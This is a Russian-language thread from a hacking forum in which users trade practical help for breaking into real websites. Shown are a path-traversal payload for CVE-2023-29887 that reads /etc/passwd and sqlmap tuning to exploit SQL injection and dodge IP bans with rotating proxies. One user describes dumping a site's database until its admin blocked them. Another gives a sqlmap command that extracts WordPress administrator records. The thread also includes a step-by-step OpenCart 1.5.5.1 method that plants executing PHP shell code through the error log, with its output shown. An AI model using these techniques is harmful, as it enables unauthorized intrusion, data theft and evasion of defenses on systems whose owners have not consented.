• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

Отслеживать
Вопрос по CVE-2023-29887

С помощью
Код: 
spreadsheet-reader/test.php
можно прочесть любой файл системы (доступный для пхп процесса) (
Код: 
spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd
).
Как дальше продолжать эксплойт? Какие тулзы имеются?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
vosemdesyatperviy сказал(а):
Посмотреть вложение 65936
мап подтвердил скулю, только проблема осталась: connection timed out
добавил --threads=10, --keep-alive, -o
Попробуй поставить меньшее значение level risk, если не поможет использовать тамперы, через -v3 можешь посмотреть после какого запроса у тебя сервер перестает отвечать(Возможно просто слишком большое количество запросов за короткое время и из-за этого перестает отвечать), тебе мапа пишет, что нужно ставить меньшее значение потоков, лучше на 1 потоке такое крутить, если не поможет попробуй прокси либо тор
Попробуй сначала крутить на 1 потоке, если будет такая же ошибка, поставить delay либо time-sec
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Проблема с раскруткой таргета
мапа находит инжект, тайм скуля, но бд не выводит, точнее после небольшого перебора тамперов выводит следующее:
1695474932490.png

Естественно значение current-db ложное и в дальнейшем крутить не получается, в ответ сервер никаких ошибок не выдает, пробовал поиграться с delay, при поиске родного айпи натыкаюсь на серв Microsoft, так же когда таргет крутится, в начале пытается редиректить на другую страницу:
got a 302 redirect to https://www.target.com/recipe/1, где нас встречает капча:
[WARNING] potential CAPTCHA protection mechanism detected
Если пробовать ignore-redirect ничего не меняется, так же выводит бд "u" и все, какие варианты раскрутки еще можно придумать, может у кого какая идея есть?
 
не дает коннект.
нет спаркер нашел дырку (наверное), ну и пытаюсь ее вставить в мап. тут сразу же нахуй шлёт.
Код: 
[CRITICAL] all testable parameters you provided are not present within the given request data

Я думаю, ну ладно бывает. Там нашло 2 дырки (вообще 4), вписываю (уточню: вписываю - это копирую команду из нетспаркера. уже из найденой уязвимости) другую, такая же история.
Начал гуглить, но нормальной инфы не нашел, кроме как в -p "inj" , поменять на -p 'inj'. Но это я тоже попробовал, однако ничего не изменилось. Чуть попозже вспомнил, что есть -r. Скопировал весь запрос с пост данными и вставил файл. Запускаю, выдает, то что оно обнаружило в пост теле (POST body) JSON, спрашивает продолжить ли? я выбираю y:
Код: 
JSON data found in POST body. Do you want to process it? [Y/n/q] y

Далее как бы должна начаться проверка соединения, но, этого по какой-то причине не происходит, выдает информацию, о том, чтобы я попробовал изменить юзер-агент, либо рандомизировал юзер-агенты, либо прикрутил прокси к запросу или выбрал файл с прокси (однако в конечном итоге, выдает информацию, что оно не может получить коннект к URL):
Код: 
[15:57:46] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[15:57:46] [WARNING] if the problem persists please check that the provided target URL is reachable. In case that it is, you can try to rerun with switch '--random-agent' and/or proxy switches ('--proxy', '--proxy-file'...)
[15:58:05] [CRITICAL] unable to connect to the target URL

После этого я в файле удаляю юзер-агент, и приписываю --random-agent, стартую, выдает такое же. При выборе работы с JSON, пробовал и n, но ничего не меняется. Сами прокси не пробовал крутить, но думаю, что это неособо поможет, ибо я пробовал зайти на сайт, и он работает нормально, т.е. админ меня не забанил, я пробовал зайти по ссылке где уязвимость, мне выдало, что админ что-то там запретил или что-то подобное. После этого всего, я пробовал делать запрос через Private Keeper, это такой конструктор программок-брутов-чекеров-автореггеров), выбираю POST, вписываю ссылку, пост тело и все нормально проходит и выдает такую ошибку синтаксиса и что у вас (или у сайта) где-то ошибка в каком-то месте (так же как и в спаркере).

Как вообще бороться с такой фигней?
Ниже приложу всю фигню.
Код: 
POST /api/v5/rat/qwe/list HTTP/1.1
Host: site.com
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 43
Content-Type: application/json
Cookie: mh_0.xxxx-xxxx-xxxx-5141=12345; mh_0.xxxx-xxxx-xxxx-8411=12345; mh_0.01439054269486495=12345; mh_0.xxxx-xxxx-xxxx-9001=12345; mh_0.xxxx-xxxx-xxxx-9852=12345; mh_0.44662906566396665=12345; mh_0.29787683827826394=12345; mh_0.xxxx-xxxx-xxxx-6318=12345; mh_0.xxxx-xxxx-xxxx-9425=12345; mh_0.xxxx-xxxx-xxxx-8591=12345; mh_0.xxxx-xxxx-xxxx-0934=12345; mh_0.xxxx-xxxx-xxxx-0313=12345; mh_0.xxxx-xxxx-xxxx-5453=12345; mh_0.xxxx-xxxx-xxxx-5596=12345; mh_0.xxxx-xxxx-xxxx-4301=12345; mh_0.xxxx-xxxx-xxxx-4084=12345; mh_0.xxxx-xxxx-xxxx-2445=12345; mh_0.30039527502876084=12345; mh_0.xxxx-xxxx-xxxx-7556=12345; mh_0.xxxx-xxxx-xxxx-8817=12345; mh_0.028660444293004073=12345; mh_0.20064545350200724=12345; mh_0.xxxx-xxxx-xxxx-1914=12345; mh_0.16115394674470895=12345; mh_0.xxxx-xxxx-xxxx-2959=12345; mh_0.13529708285140707=12345; mh_0.xxxx-xxxx-xxxx-5653=12345; mh_0.xxxx-xxxx-xxxx-7371=12345; mh_0.xxxx-xxxx-xxxx-8423=12345; mh_0.20910071894665583=12345; mh_0.xxxx-xxxx-xxxx-2058=12345; mh_0.26460930729711607=12345; mh_0.xxxx-xxxx-xxxx-1757=12345; mh_0.xxxx-xxxx-xxxx-2633=12345; mh_0.xxxx-xxxx-xxxx-0284=12345; mh_0.xxxx-xxxx-xxxx-1486=12345; mh_0.xxxx-xxxx-xxxx-5287=12345; mh_0.05099783026968008=12345; mh_0.xxxx-xxxx-xxxx-5502=12345; mh_0.xxxx-xxxx-xxxx-5875=12345; mh_0.xxxx-xxxx-xxxx-2696=12345; mh_0.xxxx-xxxx-xxxx-1014=12345; mh_0.16098067038251318=12345; mh_0.xxxx-xxxx-xxxx-0019=12345; mh_0.47800802206386583=12345; mh_0.044356477574077235=12345; mh_0.xxxx-xxxx-xxxx-5732=12345; mh_0.14938387520076724=12345; mh_0.xxxx-xxxx-xxxx-5071=12345; mh_0.16276484389343726=12345; mh_0.xxxx-xxxx-xxxx-0861=12345; mh_0.xxxx-xxxx-xxxx-0551=12345; mh_0.xxxx-xxxx-xxxx-7573=12345; mh_0.xxxx-xxxx-xxxx-5163=12345; mh_0.08771201371124104=12345
lanType: en
Referer: https://site.com/page
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36

{"Algorithm":"GPU","label":"'%2BNSFTW%2B'"}
 
cfx сказал(а):
не дает коннект.
нет спаркер нашел дырку (наверное), ну и пытаюсь ее вставить в мап. тут сразу же нахуй шлёт.
Код: 
[CRITICAL] all testable parameters you provided are not present within the given request data

Я думаю, ну ладно бывает. Там нашло 2 дырки (вообще 4), вписываю (уточню: вписываю - это копирую команду из нетспаркера. уже из найденой уязвимости) другую, такая же история.
Начал гуглить, но нормальной инфы не нашел, кроме как в -p "inj" , поменять на -p 'inj'. Но это я тоже попробовал, однако ничего не изменилось. Чуть попозже вспомнил, что есть -r. Скопировал весь запрос с пост данными и вставил файл. Запускаю, выдает, то что оно обнаружило в пост теле (POST body) JSON, спрашивает продолжить ли? я выбираю y:
Код: 
JSON data found in POST body. Do you want to process it? [Y/n/q] y

Далее как бы должна начаться проверка соединения, но, этого по какой-то причине не происходит, выдает информацию, о том, чтобы я попробовал изменить юзер-агент, либо рандомизировал юзер-агенты, либо прикрутил прокси к запросу или выбрал файл с прокси (однако в конечном итоге, выдает информацию, что оно не может получить коннект к URL):
Код: 
[15:57:46] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[15:57:46] [WARNING] if the problem persists please check that the provided target URL is reachable. In case that it is, you can try to rerun with switch '--random-agent' and/or proxy switches ('--proxy', '--proxy-file'...)
[15:58:05] [CRITICAL] unable to connect to the target URL

После этого я в файле удаляю юзер-агент, и приписываю --random-agent, стартую, выдает такое же. При выборе работы с JSON, пробовал и n, но ничего не меняется. Сами прокси не пробовал крутить, но думаю, что это неособо поможет, ибо я пробовал зайти на сайт, и он работает нормально, т.е. админ меня не забанил, я пробовал зайти по ссылке где уязвимость, мне выдало, что админ что-то там запретил или что-то подобное. После этого всего, я пробовал делать запрос через Private Keeper, это такой конструктор программок-брутов-чекеров-автореггеров), выбираю POST, вписываю ссылку, пост тело и все нормально проходит и выдает такую ошибку синтаксиса и что у вас (или у сайта) где-то ошибка в каком-то месте (так же как и в спаркере).

Как вообще бороться с такой фигней?
Ниже приложу всю фигню.
Код: 
POST /api/v5/rat/qwe/list HTTP/1.1
Host: site.com
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 43
Content-Type: application/json
Cookie: mh_0.xxxx-xxxx-xxxx-5141=12345; mh_0.xxxx-xxxx-xxxx-8411=12345; mh_0.01439054269486495=12345; mh_0.xxxx-xxxx-xxxx-9001=12345; mh_0.xxxx-xxxx-xxxx-9852=12345; mh_0.44662906566396665=12345; mh_0.29787683827826394=12345; mh_0.xxxx-xxxx-xxxx-6318=12345; mh_0.xxxx-xxxx-xxxx-9425=12345; mh_0.xxxx-xxxx-xxxx-8591=12345; mh_0.xxxx-xxxx-xxxx-0934=12345; mh_0.xxxx-xxxx-xxxx-0313=12345; mh_0.xxxx-xxxx-xxxx-5453=12345; mh_0.xxxx-xxxx-xxxx-5596=12345; mh_0.xxxx-xxxx-xxxx-4301=12345; mh_0.xxxx-xxxx-xxxx-4084=12345; mh_0.xxxx-xxxx-xxxx-2445=12345; mh_0.30039527502876084=12345; mh_0.xxxx-xxxx-xxxx-7556=12345; mh_0.xxxx-xxxx-xxxx-8817=12345; mh_0.028660444293004073=12345; mh_0.20064545350200724=12345; mh_0.xxxx-xxxx-xxxx-1914=12345; mh_0.16115394674470895=12345; mh_0.xxxx-xxxx-xxxx-2959=12345; mh_0.13529708285140707=12345; mh_0.xxxx-xxxx-xxxx-5653=12345; mh_0.xxxx-xxxx-xxxx-7371=12345; mh_0.xxxx-xxxx-xxxx-8423=12345; mh_0.20910071894665583=12345; mh_0.xxxx-xxxx-xxxx-2058=12345; mh_0.26460930729711607=12345; mh_0.xxxx-xxxx-xxxx-1757=12345; mh_0.xxxx-xxxx-xxxx-2633=12345; mh_0.xxxx-xxxx-xxxx-0284=12345; mh_0.xxxx-xxxx-xxxx-1486=12345; mh_0.xxxx-xxxx-xxxx-5287=12345; mh_0.05099783026968008=12345; mh_0.xxxx-xxxx-xxxx-5502=12345; mh_0.xxxx-xxxx-xxxx-5875=12345; mh_0.xxxx-xxxx-xxxx-2696=12345; mh_0.xxxx-xxxx-xxxx-1014=12345; mh_0.16098067038251318=12345; mh_0.xxxx-xxxx-xxxx-0019=12345; mh_0.47800802206386583=12345; mh_0.044356477574077235=12345; mh_0.xxxx-xxxx-xxxx-5732=12345; mh_0.14938387520076724=12345; mh_0.xxxx-xxxx-xxxx-5071=12345; mh_0.16276484389343726=12345; mh_0.xxxx-xxxx-xxxx-0861=12345; mh_0.xxxx-xxxx-xxxx-0551=12345; mh_0.xxxx-xxxx-xxxx-7573=12345; mh_0.xxxx-xxxx-xxxx-5163=12345; mh_0.08771201371124104=12345
lanType: en
Referer: https://site.com/page
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36

{"Algorithm":"GPU","label":"'%2BNSFTW%2B'"}
Скормить мапу запрос через .txt пробовал (флаг -r)? Предварительно удалив хидер Content-Length. Еще лаги и прочая х#йня может быть из-за Accept-Encoding хидера. Надо пробовать "играться" с хидерами. Что бы скармливать мапу JSON через флаг -u - надо действовать так: https://xss.pro/threads/75306/post-520086
 
c0d3x сказал(а):
Скормить мапу запрос через .txt пробовал (флаг -r)? Предварительно удалив хидер Content-Length. Еще лаги и прочая х#йня может быть из-за Accept-Encoding хидера. Надо пробовать "играться" с хидерами. Что бы скармливать мапу JSON через флаг -u - надо действовать так: https://xss.pro/threads/75306/post-520086
Получилось по 2-му способу. (Уже раскрутил)
По первому пробовал и энкодинг удалять и контент, вообще все удалял кроме host и пост тела и запроса.
 
Подскажите пожалуйста , в WP где то можно посмотреть в бд привилегии админа , что бы понимаь что именно этот юсер в таблице wp_users админ, они в основном с верху дампятся , но бывает и нет. Знаю что дето в какой то таблице еще можно посомтреть,что бы сравнить, напомните пожалуйста.Спасибо.
 
mayone сказал(а):
Подскажите пожалуйста , в WP где то можно посмотреть в бд привилегии админа , что бы понимаь что именно этот юсер в таблице wp_users админ, они в основном с верху дампятся , но бывает и нет. Знаю что дето в какой то таблице еще можно посомтреть,что бы сравнить, напомните пожалуйста.Спасибо.
wp_usermeta вроде.
 
c0d3x , подскажи как быть. Сливал этот сайт и админ захуярил меня в 4 утра. Натянул прокси лист, но с ним сливать как будто не варик, потому что прокси не серверные и постоянно отлетают и обновляются, хз что делать
 
cfx сказал(а):
c0d3x , подскажи как быть. Сливал этот сайт и админ захуярил меня в 4 утра. Натянул прокси лист, но с ним сливать как будто не варик, потому что прокси не серверные и постоянно отлетают и обновляются, хз что делать
Сложно сказать. Если там бан по IP после какого-то определенного количества запросов, то нормальные серверные прокси юзать надо, в количестве 100~500 шт., и юзать --proxy-freq=4 например.
 
mayone сказал(а):
Подскажите пожалуйста , в WP где то можно посмотреть в бд привилегии админа , что бы понимаь что именно этот юсер в таблице wp_users админ, они в основном с верху дампятся , но бывает и нет. Знаю что дето в какой то таблице еще можно посомтреть,что бы сравнить, напомните пожалуйста.Спасибо.
-T wp_usermeta -C meta_key,meta_value,user_id --dump --where="meta_value LIKE '%administrator%'"
wp_capabilities,"a:1:{s:13:""administrator"";b:1;}",1
 
c0d3x сказал(а):
Сложно сказать. Если там бан по IP после какого-то определенного количества запросов, то нормальные серверные прокси юзать надо, в количестве 100~500 шт., и юзать --proxy-freq=4 например.
пиздец сложная штука... просто стабильно раз в час прокси перезапускать как бдуто нужно, 1 раз ошибку выдало - некст прокся. За 1 такой заход, сливается ~400-700 строк. 😢
 
mayone сказал(а):
подскажите плиз актуальный метод заливки шелла через админку на Opencart Version 1.5.5.1
Спасибо
1.Go to System -> Settings -> Edit (Your Store) -> Server Tab and at "Error Log Filename" input... put error.php and click save
2.Create example.sql with this content: SELECT '<?php echo "<pre>";print_r(shell_exec("ls ../../")); ?>' FROM `inexistent_table`
3.Go to System -> Backup / Restore and at Restore Backup select your example.sql file and press Restore
4.Go to http://www.site.com/system/logs/error.php and there is your php code executed.
 
hvb сказал(а):
1.Go to System -> Settings -> Edit (Your Store) -> Server Tab and at "Error Log Filename" input... put error.php and click save
2.Create example.sql with this content: SELECT '<?php echo "<pre>";print_r(shell_exec("ls ../../")); ?>' FROM `inexistent_table`
3.Go to System -> Backup / Restore and at Restore Backup select your example.sql file and press Restore
4.Go to http://www.site.com/system/logs/error.php and there is your php code executed.
Спасибо, я уже видел, сделал это, но так и не понял куда там заливать шелл, открылся эррорлог и все
Код: 
11:19:44 - PHP Notice: Undefined index: query in /home/testxxx/public_html/catalog/controller/pavblog/seo.php on line :19:44 -
нет уплада
 
mayone сказал(а):
Спасибо, я уже видел, сделал это, но так и не понял куда там заливать шелл, открылся эррорлог и все
Код: 
11:19:44 - PHP Notice: Undefined index: query in /home/testxxx/public_html/catalog/controller/pavblog/seo.php on line :19:44 -
нет уплада
Ты меняешь разрешение файла, куда записываются ошибки, на .php
Потом загружаешь через бэкап базы файл с SQL запросом, который заведомо ошибочен.
Он запишется в error.php и код <?php echo "<pre>";print_r(shell_exec("ls ../../")); ?> выполнится.
Попробуй изменить на <?php echo("123"); ?> или phpinfo(); и проверь еще раз, выполнится это или нет.

Если system/logs/error.php откроешь и увидишь выполнение, значит считай у тебя есть шелл. Если сам файл тебе доступен, но код в нем не выполняется и ты увидишь его с тегами <?php ?>, то дырка пофикшена через .htaccess, где стоит запрет на выполнение кода в этой папке.
 
hvb сказал(а):
Ты меняешь разрешение файла, куда записываются ошибки, на .php
Потом загружаешь через бэкап базы файл с SQL запросом, который заведомо ошибочен.
Он запишется в error.php и код <?php echo "<pre>";print_r(shell_exec("ls ../../")); ?> выполнится.
Попробуй изменить на <?php echo("123"); ?> или phpinfo(); и проверь еще раз, выполнится это или нет.

Если system/logs/error.php откроешь и увидишь выполнение, значит считай у тебя есть шелл. Если сам файл тебе доступен, но код в нем не выполняется и ты увидишь его с тегами <?php ?>, то дырка пофикшена через .htaccess, где стоит запрет на выполнение кода в этой папке.
Код: 
Error No: 1146
SELECT '123 "

";print_r(shell_exec("ls ../../")); ?>' FROM `inexistent_table` in /home/testxxx/public_html/system/database/mmysqli.php on line 39

а при том что в инструкции вот что в логе

Код: 
2023-09-29 14:06:23 - PHP Notice:  Error: Table 'testxxx_main.inexistent_table' doesn't exist
Error No: 1146
SELECT '

Google-Ads.txt
admin
catalog
cgi-bin
components
config.php
download
error_log
image
index.php
mail1.php
php_ini
phpinfo.php
pinta_google_merchant_feed.xml
robots.txt
siteseal.html
smtp-test.php
stage
system
test.php
vendors
vqmod
wsdl
xxconfig.php
xxx.htaccess
' FROM `inexistent_table` in /home/testxxx/public_html/system/database/mmysqli.php on line 39
 
Последнее редактирование:
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх